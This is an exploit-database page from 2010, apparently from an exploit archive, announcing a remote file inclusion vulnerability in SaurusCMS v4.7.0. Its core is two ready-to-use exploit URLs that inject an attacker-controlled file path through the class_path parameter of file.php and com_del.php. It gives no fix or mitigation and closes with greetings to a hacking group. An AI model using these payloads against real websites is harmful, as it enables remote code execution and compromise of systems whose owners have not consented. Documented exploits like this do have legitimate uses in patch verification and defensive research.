SaurusCMS v4.7.0 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SaurusCMS v4.7.0 Remote File Inclusion Vulnerability
# Published : 2010-08-11
# Author : Lost. Adam
# Previous Title : KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability
# Next Title : Apache JackRabbit 2.0.0 webapp XPath Injection

# Exploit Title: [SaurusCMSupdate4.7.0 Remote File Include ]

# Date: [11-8-2010]

# Author: LoSt.HaCkEr

# Software Link: [http://www.brothersoft.com/saurus-cms-download-17626.html]

# Version: [v 4.7.0]

# Tested on: [Windows XP]

# CVE : [??? ??????]
#____Contact__LoSt.HaCkEr[at]yahoo[dot]com
____________________________________
Exploit: http://target/SaurusCMSupdate4.7.0/saurus_cms_upd4.7.0/file.php?class_path=[EV!L]
____________________________________________
Exploit: http://target/SaurusCMSupdate4.7.0/saurus_cms_upd4.7.0/com_del.php?class_path=[EV!L]
____________________________________________
A special tribute to:

DannY.iRaQi - TeaM iRaQ HaCkers